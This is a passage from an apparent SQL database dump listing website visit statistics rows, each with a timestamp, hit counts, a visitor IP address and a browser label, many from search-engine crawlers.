.70.78','chrome'),(533753,1597951523,1,1,0,0,'157.55.39.120','other'),(533754,1597951554,1,1,0,0,'66.249.64.60','chrome'),(533755,1597951635,5,5,0,0,'66.249.70.76','chrome'),(533756,1597951640,1,1,0,0,'66.249.64.58','chrome'),(533757,1597952094,8,8,0,0,'109.108.71.11','other'),(533758,1597952930,4,4,0,0,'66.249.70.78','chrome'),(533759,1597952997,2,2,0,0,'66.249.70.80','chrome'),(533760,1597953053,1,1,0,0,'217.160.65.177','chrome'),(533761,1597953103,7,7,0,0,'217.160.65.177','other'),(533762,1597953152,2,2,0,0,'66.249.70.76','chrome'),(533763,1597953250,1,1,0,0,'66.249.64.60','chrome'),(533764,1597953318,8,8,0,0,'109.108.71.11','other'),(533765,1597953443,1,1,0,0,'66.249.64.58','chrome'),(533766,1597953921,1,1,0,0,'207.46.13.252','other'),(533767,1597954583,2,2,0,0,'157.55.39.120','other'),(533768,1597954611,2,2,0,0,'66.249.70.78','chrome'),(533769,1597954624,8,8,0,0,'109.108.71.11','other'),(533770,1597955590,1,1,0,0,'134.19.179.235','firefox'),(533771,1597955810,8,8,0,0,'109.108.71.11','other'),(533772,1597956086,1,1,0,0,'66.249.70.76','chrome'),(533773,1597956555,1,1,0,0,'66.249.64.56','chrome'),(533774,1597956878,3,3,0,0,'66.249.70.78','chrome'),(533775,1597956887,2,2,0,0,'66.249.64.60','chrome'),(533776,1597956984,8,8,0,0,'109.108.71.11','other'),(533777,1597956989,1,1,0,0,'207.46.13.137','other'),(533778,1597957154,3,3,0,0,'66.249.70.80','chrome'),(533779,1597957368,81,81,0,0,'173.231.59.209','other'),(533780,1597957615,1,1,0,0,'66.249.64.56','chrome'),(533781,1597957877,2,2,0,0,'66.249.70.76','chrome'),(533782,1597957922,1,1,0,0,'157.55.39.173','other'),(533783,1597957958,1,1,0,0,'207.46.13.137','other'),(533784,1597957975,1,1,0,0,'66.249.64.58','chrome'),(533785,1597958087,8,8,0,0,'109.108.71.11','other'),(533786,1597958501,1,1,0,0,'66.249.70.80','chrome'),(533787,1597958604,2,2,0,0,'66.249.70.78','chrome'),(533788,1597958834,1,1,0,0,'8.29.198.27','other'),(533789,1597959194,8,8,0,0,'109.108.71.11','other'),(533790,1597959504,2,2,0,0,'66.249.70.76','chrome'),(533791,1597959691,1,1,0,0,'66.249.64.60','chrome'),(533792,1597959769,1,1,0,0,'17.58.99.7','other'),(533793,1597959945,1,1,0,0,'66.249.70.78','chrome'),(533794,1597959985,1,1,0,0,'66.249.64.56','chrome'),(533795,1597960067,2,2,0,0,'66.249.70.80','chrome'),(533796,1597960214,2,2,0,0,'66.249.64.58','chrome'),(533797,1597960323,8,8,0,0,'109.108.71.11','other'),(533798,1597960917,2,2,0,0,'66.249.70.76','chrome'),(533799,1597960964,2,2,0,0,'66.249.70.78','chrome'),(533800,1597961162,3,3,0,0,'66.249.70.80','chrome'),(533801,1597961310,1,1,0,0,'66.249.64.60','chrome'),(533802,1597961407,8,8,0,0,'109.108.71.11','other'),(533803,1597961533,1,1,0,0,'162.253.131.19','other'),(533804,1597961875,3,3,0,0,'66.249.70.76','chrome'),(533805,1597962431,1,1,0,0,'157.55.39.251','other'),(533806,1597962542,8,8,0,0,'109.108.71.11','other'),(533807,1597962803,1,1,0,0,'66.249.70.80','chrome'),(533808,1597962922,2,2,0,0,'66.249.70.76','chrome'),(533809,1597963252,1,1,0,0,'207.46.13.28','other'),(533810,1597963404,1,1,0,0,'207.46.13.252','other'),(533811,1597963519,2,2,0,0,'157.55.39.120','other'),(533812,1597963630,8,8,0,0,'109.108.71.11','other'),(533813,1597963903,1,1,0,0,'17.58.99.7','other'),(533814,1597964205,1,1,0,0,'207.46.13.241','other'),(533815,1597964562,1,1,0,0,'207.46.13.252','other'),(533816,1597964732,8,8,0,0,'109.108.71.11','other'),(533817,1597965132,2,2,0,0,'66.249.70.80','chrome'),(533818,1597965527,1,1,0,0,'66.249.70.78','chrome'),(533819,1597965813,8,8,0,0,'109.108.71.11','other'),(533820,1597966895,8,8,0,0,'109.108.71.11','other'),(533821,1597967432,1,1,0,0,'207.46.13.241','other'),(533822,1597967708,1,1,0,0,'62.205.134.182','other'),(533823,1597967796,1,1,0,0,'213.180.203.46','other'),(533824,1597968023,8,8,0,0,'109.108.71.11','other'),(533825,1597968144,1,1,0,0,'157.55.39.12','other'),(533826,1597968924,1,1,0,0,'207.46.13.101','other'),(533827,1597969158,8,8,0,0,'109.108.71.11','other'),(533828,1597969666,1,1,0,0,'8.29.198.26','other'),(533829,1597970300,8,8,0,0,'109.108.71.11','other'),(533830,1597970540,5,5,0,0,'66.249.70.78','chrome'),(533831,1597970889,1,0,1,0,'66.249.70.80',''),(533832,1597970911,2,2,0,0,'66.249.70.76','chrome'),(533833,1597971109,1,1,0,0,'17.58.99.7','other'),(533834,1597971408,8,8,0,0,'109.108.71.11','other'),(533835,1597971602,3,2,1,0,'66.249.70.78',''),(533836,1597971814,1,1,0,0,'66.249.70.76','chrome'),(533837,1597972005,1,1,0,0,'66.249.70.80','chrome'),(533838,1597972468,8,8,0,0,'109.108.71.11','other'),(533839,1597972590,1,1,0,0,'157.55.39.57','other'),(533840,1597973185,2,2,0,0,'66.249.70.78','chrome'),(533841,1597973351,1,1,0,0,'66.249.70.80','chrome'),(533842,1597973572,8,8,0,0,'109.108.71.11','other'),(533843,1597973647,2,2,0,0,'66.249.70.76','chrome'),(533844,1597974142,2,2,0,0,'66.249.70.78','chrome'),(533845,1597974481,3,3,0,0,'66.249.70.80','chrome'),(533846,1597974626,8,8,0,0,'109.108.71.11','other'),(533847,1597975288,1,1,0,0,'157.55.39.156','other'),(533848,1597975410,1,1,0,0,'207.46.13.41','other'),(533849,1597975460,1,1,0,0,'66.249.70.78','chrome'),(533850,1597975647,2,2,0,0,'66.249.70.76','chrome'),(533851,1597975686,8,8,0,0,'109.108.71.11','other'),(533852,1597975808,2,2,0,0,'207.46.13.73','other'),(533853,1597976222,1,1,0,0,'157.55.39.173','other'),(533854,1597976731,8,8,0,0,'109.108.71.11','other'),(533855,1597976832,3,3,0,0,'66.249.70.76','chrome'),(533856,1597976837,4,4,0,0,'66.249.70.78','chrome'),(533857,1597977142,1,1,0,0,'207.46.13.231','other'),(533858,1597977271,2,2,0,0,'66.249.64.58','chrome'),(533859,1597977609,1,1,0,0,'95.152.48.20','chrome'),(533860,1597977744,3,3,0,0,'66.249.70.76','chrome'),(533861,1597977749,1,1,0,0,'66.249.64.56','chrome'),(533862,1597977804,8,8,0,0,'109.108.71.11','other'),(533863,1597977845,3,3,0,0,'66.249.70.78','chrome'),(533864,1597978134,3,3,0,0,'66.249.70.80','chrome'),(533865,1597978671,3,3,0,0,'66.249.70.76','chrome'),(533866,1597978791,3,3,0,0,'66.249.70.78','chrome'),(533867,1597978843,8,8,0,0,'109.108.71.11','other'),(533868,1597979017,1,1,0,0,'66.249.64.56','chrome'),(533869,1597979064,2,2,0,0,'66.249.70.80','chrome'),(533870,1597979804,3,3,0,0,'66.249.70.76','chrome'),(533871,1597979818,2,2,0,0,'66.249.64.60','chrome'),(533872,1597979896,8,8,0,0,'109.108.71.11','other'),(533873,1597979929,2,2,0,0,'66.249.70.78','chrome'),(533874,1597980493,1,1,0,0,'8.29.198.25','other'),(533875,1597980651,1,1,0,0,'207.46.13.150','other'),(533876,1597980678,1,1,0,0,'66.249.70.80','chrome'),(533877,1597980848,1,1,0,0,'66.249.70.78','chrome'),(533878,1597981012,8,8,0,0,'109.108.71.11','other'),(533879,1597981146,1,1,0,0,'207.46.13.68','other'),(533880,1597981226,1,1,0,0,'92.53.65.23','other'),(533881,1597981813,1,1,0,0,'66.249.64.56','chrome'),(533882,1597981823,4,4,0,0,'66.249.70.76','chrome'),(533883,1597982037,1,1,0,0,'66.249.70.80','chrome'),(533884,1597982055,8,8,0,0,'109.108.71.11','other'),(533885,1597982234,1,1,0,0,'66.249.70.78','chrome'),(533886,1597982979,1,1,0,0,'207.46.13.73','other'),(533887,1597983016,2,2,0,0,'66.249.64.56','chrome'),(533888,1597983150,3,3,0,0,'66.249.70.78','chrome'),(533889,1597983159,8,8,0,0,'109.108.71.11','other'),(533890,1597983353,1,1,0,0,'66.249.70.80','chrome'),(533891,1597983726,4,4,0,0,'66.249.70.76','chrome'),(533892,1597984037,1,1,0,0,'66.249.64.56','chrome'),(533893,1597984259,1,1,0,0,'157.55.39.173','other'),(533894,1597984455,1,1,0,0,'131.220.6.152','chrome'),(533895,1597984710,1,1,0,0,'66.249.70.78','chrome'),(533896,1597984738,2,2,0,0,'66.249.70.76','chrome'),(533897,1597984880,2,2,0,0,'66.249.70.80','chrome'),(533898,1597985542,1,1,0,0,'66.249.64.56','chrome'),(533899,1597985606,1,1,0,0,'178.133.105.141','chrome'),(533900,1597985622,8,8,0,0,'109.108.71.11','other'),(533901,1597985838,2,2,0,0,'66.249.64.60','chrome'),(533902,1597985961,1,1,0,0,'62.205.134.182','other'),(533903,1597986205,2,2,0,0,'66.249.70.78','chrome'),(533904,1597986738,8,8,0,0,'109.108.71.11','other'),(533905,1597986966,1,1,0,0,'66.249.70.80','chrome'),(533906,1597987025,1,1,0,0,'66.249.70.76','chrome'),(533907,1597987111,1,1,0,0,'66.249.64.60','chrome'),(533908,1597987882,8,8,0,0,'109.108.71.11','other'),(533909,1597987975,1,1,0,0,'207.46.13.68','other'),(533910,1597988270,1,1,0,0,'66.249.70.80','chrome'),(533911,1597988363,4,4,0,0,'66.249.70.76','chrome'),(533912,1597988987,1,1,0,0,'66.249.64.56','chrome'),(533913,1597989022,8,8,0,0,'109.108.71.11','other'),(533914,1597989480,2,2,0,0,'66.249.64.58','chrome'),(533915,1597989595,1,1,0,0,'209.17.96.74','other'),(533916,1597989665,2,2,0,0,'31.43.16.201','chrome'),(533917,1597989708,1,1,0,0,'207.46.13.41','other'),(533918,1597989711,1,1,0,0,'66.249.70.78','chrome'),(533919,1597989914,3,3,0,0,'66.249.70.80','chrome'),(533920,1597989966,1,1,0,0,'17.58.99.84','other'),(533921,1597990052,2,2,0,0,'66.249.70.76','chrome'),(533922,1597990170,8,8,0,0,'109.108.71.11','other'),(533923,1597990332,1,1,0,0,'199.247.0.35','other'),(533924,1597990921,1,1,0,0,'91.196.178.72','chrome'),(533925,1597991101,2,1,1,0,'66.249.70.76',''),(533926,1597991257,1,1,0,0,'89.163.242.241','other'),(533927,1597991320,1,1,0,0,'8.29.198.25','other'),(533929,1597991819,2,2,0,0,'77.111.247.180','chrome'),(533930,1597992193,1,1,0,0,'91.196.178.84','chrome'),(533931,1597992210,1,1,0,0,'66.249.70.76','chrome'),(533932,1597992523,8,8,0,0,'109.108.71.11','other'),(533933,1597992793,1,1,0,0,'66.249.70.80','chrome'),(533934,1597992831,1,1,0,0,'157.55.39.51','other'),(533935,1597993117,2,2,0,0,'66.249.70.76','chrome'),(533936,1597993120,1,1,0,0,'157.55.39.156','other'),(533937,1597993122,2,2,0,0,'66.249.70.78','chrome'),(533938,1597993706,8,8,0,0,'109.108.71.11','other'),(533939,1597993843,1,1,0,0,'66.249.64.58','chrome'),(533940,1597993846,1,1,0,0,'207.46.13.183','other'),(533941,1597993946,1,1,0,0,'91.196.178.58','chrome'),(533942,1597994557,1,1,0,0,'207.46.13.99','other'),(533943,1597994802,2,2,0,0,'37.53.89.92','chrome'),(533944,1597994950,2,2,0,0,'66.249.70.78','chrome'),(533945,1597994951,8,8,0,0,'109.108.71.11','other'),(533946,1597995158,1,1,0,0,'66.249.64.56','chrome'),(533947,1597995436,1,1,0,0,'66.249.70.80','chrome'),(533948,1597995466,1,1,0,0,'17.58.99.7','other'),(533949,1597995782,1,1,0,0,'207.46.13.68','other'),(533950,1597996132,1,1,0,0,'66.249.70.76','chrome'),(533951,1597996168,8,8,0,0,'109.108.71.11','other'),(533952,1597996506,3,3,0,0,'66.249.70.80','chrome'),(533953,1597996723,1,1,0,0,'91.196.178.79','chrome'),(533954,1597997074,3,3,0,0,'66.249.70.76','chrome'),(533955,1597997331,8,8,0,0,'109.108.71.11','other'),(533956,1597998102,1,1,0,0,'207.46.13.26','other'),(533957,1597998539,8,8,0,0,'109.108.71.11','other'),(533958,1597998982,2,2,0,0,'66.249.70.80','chrome'),(533959,1597999494,1,1,0,0,'35.243.23.26','msie'),(533960,1597999495,1,1,0,0,'66.102.6.21','chrome'),(533961,1597999694,8,8,0,0,'109.108.71.11','other'),(533962,1598000061,1,1,0,0,'66.249.70.76','chrome'),(533963,1598000472,1,1,0,0,'199.247.0.35','other'),(533964,1598000549,7,7,0,0,'3.236.214.137','firefox'),(533965,1598000727,3,3,0,0,'66.249.70.78','chrome'),(533966,1598000858,8,8,0,0,'109.108.71.11','other'),(533967,1598000899,1,1,0,0,'66.249.70.80','chrome'),(533968,1598001028,1,1,0,0,'66.249.70.76','chrome'),(533969,1598001942,1,1,0,0,'66.249.70.80','chrome'),(533970,1598002034,8,8,0,0,'109.108.71.11','other'),(533971,1598002154,1,1,0,0,'8.29.198.26','other'),(533972,1598002243,2,2,0,0,'94.130.9.183','other'),(533973,1598002402,2,2,0,0,'66.249.70.78','chrome'),(533974,1598002420,1,1,0,0,'66.249.70.76','chrome'),(533975,1598002712,1,1,0,0,'5.45.207.174','other'),(533976,1598003176,1,1,0,0,'91.196.178.72','chrome'),(533977,1598003202,8,8,0,0,'109.108.71.11','other'),(533978,1598003250,1,1,0,0,'66.249.70.80','chrome'),(533979,1598003813,1,1,0,0,'156.146.34.1','msie'),(533980,1598003819,2,2,0,0,'156.146.34.1','other'),(533981,1598003873,1,1,0,0,'195.181.170.225','other'),(533982,1598003874,2,2,0,0,'65.154.226.100','chrome'),(533983,1598004004,1,1,0,0,'138.122.192.159','firefox'),(533984,1598004038,1,1,0,0,'207.46.13.68','other'),(533985,1598004045,1,1,0,0,'188.126.89.4','other'),(533986,1598004047,1,1,0,0,'212.102.36.166','other'),(533987,1598004054,1,1,0,0,'156.146.34.1','firefox'),(533988,1598004191,2,2,0,0,'185.77.248.5','other'),(533989,1598004397,4,4,0,0,'66.249.70.76','chrome'),(533990,1598004409,8,8,0,0,'109.108.71.11','other'),(533991,1598004427,2,2,0,0,'66.249.70.80','chrome'),(533992,1598004755,1,1,0,0,'5.255.253.183','other'),(533993,1598004788,1,1,0,0,'157.55.39.58','other'),(533994,1598004990,1,1,0,0,'23.81.128.128','chrome'),(533995,1598005148,1,1,0,0,'34.201.49.114','chrome'),(533996,1598005230,2,2,0,0,'92.113.188.116','chrome'),(533997,1598005410,1,1,0,0,'207.46.13.77','other'),(533998,1598005626,1,1,0,0,'5.45.207.174','other'),(533999,1598005658,8,8,0,0,'109.108.71.11','other'),(534000,1598005833,2,2,0,0,'66.249.70.76','chrome'),(534001,1598006106,1,1,0,0,'91.196.178.188','chrome'),(534002,1598006128,1,1,0,0,'66.249.70.78','chrome'),(534003,1598006139,1,1,0,0,'5.45.207.92','other'),(534004,1598006231,1,1,0,0,'17.58.99.84','other'),(534005,1598006499,2,2,0,0,'91.196.178.9','chrome'),(534006,1598006582,2,2,0,0,'207.46.13.68','other'),(534007,1598006625,1,1,0,0,'66.249.64.58','chrome'),(534008,1598006634,1,1,0,0,'65.154.226.109','chrome'),(534009,1598006878,8,8,0,0,'109.108.71.11','other'),(534010,1598006982,1,1,0,0,'66.249.70.76','chrome'),(534011,1598007464,1,1,0,0,'91.196.178.9','chrome'),(534012,1598007814,1,1,0,0,'66.249.70.80','chrome'),(534013,1598008019,8,8,0,0,'109.108.71.11','other'),(534014,1598009091,2,2,0,0,'5.255.253.136','other'),(534015,1598009190,8,8,0,0,'109.108.71.11','other'),(534016,1598009584,1,1,0,0,'5.255.253.69','other'),(534017,1598009702,1,1,0,0,'5.45.207.135','other'),(534018,1598009809,2,2,0,0,'80.91.181.76','chrome'),(534019,1598010144,1,1,0,0,'5.45.207.174','other'),(534020,1598010286,1,1,0,0,'109.74.154.72','chrome'),(534021,1598010358,8,8,0,0,'109.108.71.11','other'),(534022,1598010499,1,1,0,0,'66.249.64.60','chrome'),(534023,1598010574,3,3,0,0,'66.249.70.78','chrome'),(534024,1598011417,1,1,0,0,'5.255.253.105','other'),(534025,1598011486,8,8,0,0,'109.108.71.11','other'),(534026,1598011586,1,1,0,0,'176.241.155.174','chrome'),(534027,1598011714,3,3,0,0,'66.249.70.78','chrome'),(534028,1598011759,1,1,0,0,'176.193.8.94','chrome'),(534029,1598011763,1,1,0,0,'198.20.175.239','chrome'),(534030,1598011870,2,2,0,0,'91.196.177.46','chrome'),(534031,1598012113,1,1,0,0,'66.249.70.76','chrome'),(534032,1598012436,2,1,1,0,'66.249.70.80',''),(534033,1598012527,1,1,0,0,'91.196.178.119','chrome'),(534034,1598012713,1,1,0,0,'5.45.207.66','other'),(534035,1598012726,8,8,0,0,'109.108.71.11','other'),(534036,1598012838,1,1,0,0,'5.255.253.136','other'),(534037,1598012980,1,1,0,0,'66.249.70.78','chrome'),(534038,1598012982,1,1,0,0,'8.29.198.26','other'),(534039,1598013891,8,8,0,0,'109.108.71.11','other'),(534040,1598013984,1,1,0,0,'66.249.70.78','chrome'),(534041,1598014511,1,1,0,0,'91.196.178.9','chrome'),(534042,1598014987,8,8,0,0,'109.108.71.11','other'),(534043,1598015082,2,2,0,0,'66.249.70.80','chrome'),(534044,1598015246,1,1,0,0,'66.249.70.76','chrome'),(534045,1598015345,3,3,0,0,'178.92.75.41','chrome'),(534046,1598016062,8,8,0,0,'109.108.71.11','other'),(534047,1598016229,1,1,0,0,'66.249.70.80','chrome'),(534048,1598016258,1,1,0,0,'5.45.207.92','other'),(534049,1598016400,1,1,0,0,'66.249.70.78','chrome'),(534050,1598016979,2,2,0,0,'91.196.178.9','chrome'),(534051,1598017040,1,1,0,0,'5.255.253.69','other'),(534052,1598017069,8,8,0,0,'109.108.71.11','other'),(534053,1598017204,1,1,0,0,'5.45.207.174','other'),(534054,1598017260,1,1,0,0,'69.171.251.8','other'),(534055,1598017266,1,1,0,0,'66.249.70.80','chrome'),(534056,1598017629,44,44,0,0,'192.99.14.130','other'),(534057,1598017739,1,1,0,0,'5.45.207.146','other'),(534058,1598017850,1,1,0,0,'66.249.70.76','chrome'),(534059,1598018046,1,1,0,0,'91.196.178.9','chrome'),(534060,1598018242,8,8,0,0,'109.108.71.11','other'),(534061,1598018530,5,5,0,0,'192.99.14.130','other'),(534062,1598018585,1,1,0,0,'5.45.207.92','other'),(534063,1598019089,1,1,0,0,'66.249.70.80','chrome'),(534064,1598019424,2,2,0,0,'66.249.70.78','chrome'),(534065,1598019434,8,8,0,0,'109.108.71.11','other'),(534066,1598019607,2,2,0,0,'66.249.70.76','chrome'),(534067,1598019619,18,18,0,0,'192.99.14.130','other'),(534068,1598019945,1,1,0,0,'207.46.13.68','other'),(534069,1598020056,2,2,0,0,'66.249.70.80','chrome'),(534070,1598020631,2,2,0,0,'5.45.207.174','other'),(534071,1598020683,8,8,0,0,'109.108.71.11','other'),(534072,1598021034,1,0,1,0,'66.249.70.78',''),(534073,1598021882,8,8,0,0,'109.108.71.11','other'),(534074,1598022041,1,1,0,0,'66.249.70.80','chrome'),(534075,1598022067,1,1,0,0,'5.45.207.153','other'),(534076,1598022648,1,1,0,0,'66.249.70.76','chrome'),(534077,1598023065,8,8,0,0,'109.108.71.11','other'),(534078,1598023193,2,2,0,0,'66.249.70.78','chrome'),(534079,1598023401,1,1,0,0,'5.45.207.174','other'),(534080,1598023819,1,1,0,0,'8.29.198.27','other'),(534081,1598024267,8,8,0,0,'109.108.71.11','other'),(534082,1598024322,1,1,0,0,'5.45.207.174','other'),(534083,1598025083,1,1,0,0,'185.137.234.10','chrome'),(534084,1598025427,8,8,0,0,'109.108.71.11','other'),(534085,1598025473,1,1,0,0,'66.249.70.78','chrome'),(534086,1598025882,1,1,0,0,'207.46.13.68','other'),(534087,1598026575,8,8,0,0,'109.108.71.11','other'),(534088,1598027801,8,8,0,0,'109.108.71.11','other'),(534089,1598027934,2,2,0,0,'5.45.207.174','other'),(534090,1598028096,3,3,0,0,'66.249.64.58','chrome'),(534091,1598028145,6,6,0,0,'66.249.70.76','chrome'),(534092,1598028240,4,4,0,0,'66.249.70.80','chrome'),(534093,1598028487,1,1,0,0,'5.45.207.92','other'),(534094,1598029137,1,1,0,0,'66.249.70.78','chrome'),(534095,1598029172,3,3,0,0,'66.249.70.76','chrome'),(534096,1598029434,1,1,0,0,'66.249.64.60','chrome'),(534097,1598029558,2,2,0,0,'66.249.70.80','chrome'),(534098,1598030177,1,1,0,0,'66.249.70.76','chrome'),(534099,1598030289,5,5,0,0,'66.249.70.78','chrome'),(534100,1598030721,1,1,0,0,'66.249.70.80','chrome'),(534101,1598030969,1,1,0,0,'66.249.64.58','chrome'),(534102,1598031011,1,1,0,0,'66.249.64.56','chrome'),(534103,1598031133,5,5,0,0,'66.249.70.76','chrome'),(534104,1598031615,3,3,0,0,'66.249.70.78','chrome'),(534105,1598031758,3,3,0,0,'66.249.70.80','chrome'),(534106,1598032144,3,3,0,0,'66.249.70.76','chrome'),(534107,1598032247,1,1,0,0,'66.249.64.56','chrome'),(534108,1598032676,1,1,0,0,'66.249.64.60','chrome'),(534109,1598032697,3,3,0,0,'66.249.70.80','chrome'),(534110,1598033155,7,7,0,0,'178.62.82.141','chrome'),(534111,1598033637,3,3,0,0,'66.249.70.76','chrome'),(534112,1598033727,1,1,0,0,'66.249.70.78','chrome'),(534113,1598033868,1,1,0,0,'66.249.70.80','chrome'),(534114,1598033974,1,1,0,0,'91.196.178.9','chrome'),(534115,1598034077,1,1,0,0,'66.249.64.60','chrome'),(534116,1598034261,2,2,0,0,'66.249.70.66','chrome'),(534117,1598034294,1,1,0,0,'66.249.70.94','chrome'),(534118,1598034650,1,1,0,0,'8.29.198.26','other'),(534119,1598034855,1,1,0,0,'66.249.70.78','chrome'),(534120,1598034909,1,0,1,0,'66.249.70.76',''),(534121,1598035142,3,3,0,0,'66.249.70.80','chrome'),(534122,1598035172,2,2,0,0,'66.249.70.76','chrome'),(534123,1598035231,1,1,0,0,'173.252.111.12','other'),(534124,1598035877,1,1,0,0,'66.249.64.58','chrome'),(534125,1598036017,3,3,0,0,'66.249.70.78','chrome'),(534126,1598036056,1,1,0,0,'37.73.66.94','chrome'),(534127,1598036112,1,1,0,0,'91.196.178.9','chrome'),(534128,1598036184,1,1,0,0,'38.145.92.55','other'),(534129,1598036537,2,2,0,0,'66.249.70.76','chrome'),(534130,1598036549,1,1,0,0,'66.249.64.60','chrome'),(534131,1598036669,1,1,0,0,'5.255.253.69','other'),(534132,1598037054,4,4,0,0,'66.249.70.78','chrome'),(534133,1598037227,1,1,0,0,'178.95.245.21','chrome'),(534134,1598037434,1,1,0,0,'66.249.70.80','chrome'),(534135,1598037670,4,4,0,0,'66.249.70.76','chrome'),(534136,1598037958,1,1,0,0,'66.249.64.58','chrome'),(534137,1598038063,3,3,0,0,'66.249.70.78','chrome'),(534138,1598038453,1,1,0,0,'66.249.64.56','chrome'),(534139,1598039120,2,2,0,0,'66.249.70.78','chrome'),(534140,1598039574,3,3,0,0,'66.249.70.80','chrome'),(534141,1598039821,1,1,0,0,'66.249.70.76','chrome'),(534142,1598039840,1,1,0,0,'66.249.64.60','chrome'),(534143,1598039901,8,8,0,0,'109.108.71.11','other'),(534144,1598039964,1,1,0,0,'66.249.64.56','chrome'),(534145,1598039966,1,1,0,0,'66.249.64.58','chrome'),(534146,1598040311,1,1,0,0,'5.45.207.154','other'),(534147,1598040795,2,2,0,0,'66.249.70.78','chrome'),(534148,1598041092,8,8,0,0,'109.108.71.11','other'),(534149,1598041255,1,1,0,0,'66.249.70.76','chrome'),(534150,1598041279,1,1,0,0,'66.249.64.58','chrome'),(534151,1598042264,8,8,0,0,'109.108.71.11','other'),(534152,1598042278,4,4,0,0,'66.249.70.78','chrome'),(534153,1598042281,1,1,0,0,'141.8.142.81','other'),(534154,1598042377,2,2,0,0,'66.249.70.80','chrome'),(534155,1598042386,10,10,0,0,'66.249.70.76','chrome'),(534156,1598042575,1,1,0,0,'66.249.64.56','chrome'),(534157,1598043184,3,3,0,0,'66.249.70.78','chrome'),(534158,1598043444,8,8,0,0,'109.108.71.11','other'),(534159,1598043498,1,1,0,0,'66.249.64.60','chrome'),(534160,1598043631,4,4,0,0,'66.249.70.80','chrome'),(534161,1598043837,8,8,0,0,'66.249.70.76','chrome'),(534162,1598044594,3,3,0,0,'66.249.70.80','chrome'),(534163,1598044753,8,8,0,0,'109.108.71.11','other'),(534164,1598045058,5,5,0,0,'66.249.70.78','chrome'),(534165,1598045074,1,1,0,0,'5.45.207.70','other'),(534166,1598045138,6,6,0,0,'66.249.70.76','chrome'),(534167,1598045488,1,1,0,0,'8.29.198.27','other'),(534168,1598045808,1,1,0,0,'5.45.207.174','other'),(534169,1598045841,2,2,0,0,'66.249.70.80','chrome'),(534170,1598045920,8,8,0,0,'109.108.71.11','other'),(534171,1598046065,1,1,0,0,'66.249.70.76','chrome'),(534172,1598046481,4,4,0,0,'66.249.70.78','chrome'),(534173,1598046594,1,1,0,0,'5.45.207.92','other'),(534174,1598047096,8,8,0,0,'109.108.71.11','other'),(534175,1598047123,1,1,0,0,'66.249.70.80','chrome'),(534176,1598047168,2,2,0,0,'66.249.64.58','chrome'),(534177,1598047226,2,2,0,0,'66.249.70.76','chrome'),(534178,1598047457,2,2,0,0,'66.249.70.78','chrome'),(534179,1598047866,1,1,0,0,'66.249.64.60','chrome'),(534180,1598048264,8,8,0,0,'109.108.71.11','other'),(534181,1598048452,3,3,0,0,'66.249.70.76','chrome'),(534182,1598048704,2,2,0,0,'66.249.70.78','chrome'),(534183,1598048820,1,1,0,0,'66.249.70.80','chrome'),(534184,1598049250,1,1,0,0,'5.45.207.92','other'),(534185,1598049311,1,1,0,0,'66.249.64.58','chrome'),(534186,1598049557,8,8,0,0,'109.108.71.11','other'),(534187,1598049598,1,0,1,0,'66.249.70.76',''),(534188,1598049798,1,1,0,0,'66.249.70.76','chrome'),(534189,1598050215,5,5,0,0,'66.249.70.78','chrome'),(534190,1598050237,1,1,0,0,'66.249.64.60','chrome'),(534191,1598050418,2,2,0,0,'66.249.64.58','chrome'),(534192,1598050437,2,2,0,0,'66.249.64.56','chrome'),(534193,1598050501,1,1,0,0,'5.45.207.174','other'),(534194,1598050745,3,3,0,0,'66.249.70.80','chrome'),(534195,1598050748,8,8,0,0,'109.108.71.11','other'),(534196,1598051848,2,2,0,0,'66.249.64.56','chrome'),(534197,1598051867,4,4,0,0,'66.249.70.76','chrome'),(534198,1598051929,8,8,0,0,'109.108.71.11','other'),(534199,1598051940,1,1,0,0,'66.249.64.58','chrome'),(534200,1598051987,1,1,0,0,'5.45.207.174','other'),(534201,1598052049,1,1,0,0,'66.249.70.80','chrome'),(534202,1598052098,3,3,0,0,'66.249.70.78','chrome'),(534203,1598052201,1,1,0,0,'5.255.253.105','other'),(534204,1598052277,145,145,0,0,'5.9.141.8','other'),(534205,1598052314,1,1,0,0,'5.45.207.92','other'),(534206,1598052571,1,1,0,0,'134.19.179.235','opera'),(534207,1598053095,8,8,0,0,'109.108.71.11','other'),(534208,1598053466,1,1,0,0,'66.249.64.56','chrome'),(534209,1598054109,1,1,0,0,'62.205.134.182','other'),(534210,1598054151,3,3,0,0,'66.249.70.80','chrome'),(534211,1598054260,4,4,0,0,'66.249.70.76','chrome'),(534212,1598054267,8,8,0,0,'109.108.71.11','other'),(534213,1598054786,3,3,0,0,'66.249.70.78','chrome'),(534214,1598054791,1,1,0,0,'66.249.64.58','chrome'),(534215,1598055305,3,3,0,0,'66.249.70.80','chrome'),(534216,1598055312,2,2,0,0,'66.249.64.56','chrome'),(534217,1598055416,1,1,0,0,'5.45.207.174','other'),(534218,1598055442,8,8,0,0,'109.108.71.11','other'),(534219,1598055929,1,1,0,0,'5.255.253.136','other'),(534220,1598056316,1,1,0,0,'8.29.198.26','other'),(534221,1598056678,8,8,0,0,'109.108.71.11','other'),(534222,1598056892,5,5,0,0,'66.249.70.78','chrome'),(534223,1598056940,1,1,0,0,'66.249.70.80','chrome'),(534224,1598057088,1,0,1,0,'66.249.70.76',''),(534225,1598057188,3,3,0,0,'66.249.70.76','chrome'),(534226,1598057746,1,1,0,0,'66.249.64.58','chrome'),(534227,1598057804,8,8,0,0,'109.108.71.11','other'),(534228,1598057931,1,1,0,0,'66.249.70.78','chrome'),(534229,1598058379,1,1,0,0,'5.255.253.183','other'),(534230,1598058773,1,1,0,0,'134.19.179.235','firefox'),(534231,1598058949,8,8,0,0,'109.108.71.11','other'),(534232,1598059122,3,3,0,0,'66.249.70.76','chrome'),(534233,1598059169,1,1,0,0,'66.249.64.56','chrome'),(534234,1598059267,3,3,0,0,'66.249.70.80','chrome'),(534235,1598059300,1,1,0,0,'66.249.64.58','chrome'),(534236,1598059590,1,1,0,0,'5.45.207.92','other'),(534237,1598060089,8,8,0,0,'109.108.71.11','other'),(534238,1598060304,1,1,0,0,'5.255.253.136','other'),(534239,1598060589,3,3,0,0,'66.249.70.76','chrome'),(534240,1598060767,1,1,0,0,'5.45.207.134','other'),(534241,1598061223,8,8,0,0,'109.108.71.11','other'),(534242,1598062361,8,8,0,0,'109.108.71.11','other'),(534243,1598062640,1,1,0,0,'66.249.70.78','chrome'),(534244,1598063236,1,1,0,0,'5.45.207.174','other'),(534245,1598063469,8,8,0,0,'109.108.71.11','other'),(534246,1598064599,8,8,0,0,'109.108.71.11','other'),(534247,1598064698,1,1,0,0,'66.249.64.58','chrome'),(534248,1598065757,8,8,0,0,'109.108.71.11','other'),(534249,1598066044,1,1,0,0,'66.249.70.76','chrome'),(534250,1598066327,1,1,0,0,'23.96.58.44','chrome'),(534251,1598066835,8,8,0,0,'14.174.210.7','